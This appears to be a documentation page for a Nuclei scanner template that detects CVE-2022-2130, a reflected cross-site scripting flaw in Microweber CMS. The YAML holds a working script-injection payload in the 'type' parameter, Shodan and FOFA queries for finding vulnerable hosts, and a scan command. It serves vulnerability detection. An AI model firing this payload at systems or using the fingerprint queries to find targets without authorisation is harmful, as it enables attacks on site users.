Microweber < 1.2.17 - Cross-Site Scripting
ID: CVE-2022-2130
Severity: medium
Author: ritikchaddha
Tags: cve,cve2022,microweber,xss
Description
Section titled “Description”Cross-site Scripting (XSS) vulnerability in the /demo/editor_tools/module endpoint via the ‘type’ parameter.
YAML Source
Section titled “YAML Source”id: CVE-2022-2130
info: name: Microweber < 1.2.17 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Cross-site Scripting (XSS) vulnerability in the /demo/editor_tools/module endpoint via the 'type' parameter. impact: | Successful exploitation could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft or account compromise. remediation: | Upgrade Microweber CMS to version 1.2.17 or later to mitigate the Reflected XSS vulnerability (CVE-2022-2130). reference: - https://huntr.com/bounties/0142970a-5cb8-4dba-8bbc-4fa2f3bee65c - https://nvd.nist.gov/vuln/detail/CVE-2022-2130 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:L cvss-score: 6.1 cve-id: CVE-2022-2130 cwe-id: CWE-79 epss-score: 0.00088 epss-percentile: 0.36939 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: - http.favicon.hash:780351152 - http.html:"microweber" fofa-query: - body="microweber" - icon_hash=780351152 vendor: microweber product: microweber tags: cve,cve2022,microweber,xss
http: - method: GET path: - "{{BaseURL}}/editor_tools/module?type=%22%3E%3Cdiv%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers-condition: and matchers: - type: word part: body words: - "</tag><div><script>alert(document.domain)</script>"
- type: word part: content_type words: - text/html
- type: status status: - 200# digest: 4b0a00483046022100ae12852d19367db628ccf07018496440ab03843266ad77d8d41950a12524459a022100c09e84820be2638b6253b6504d3fe8904fbc288876adff28d7135357d2f7c175:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2130.yaml"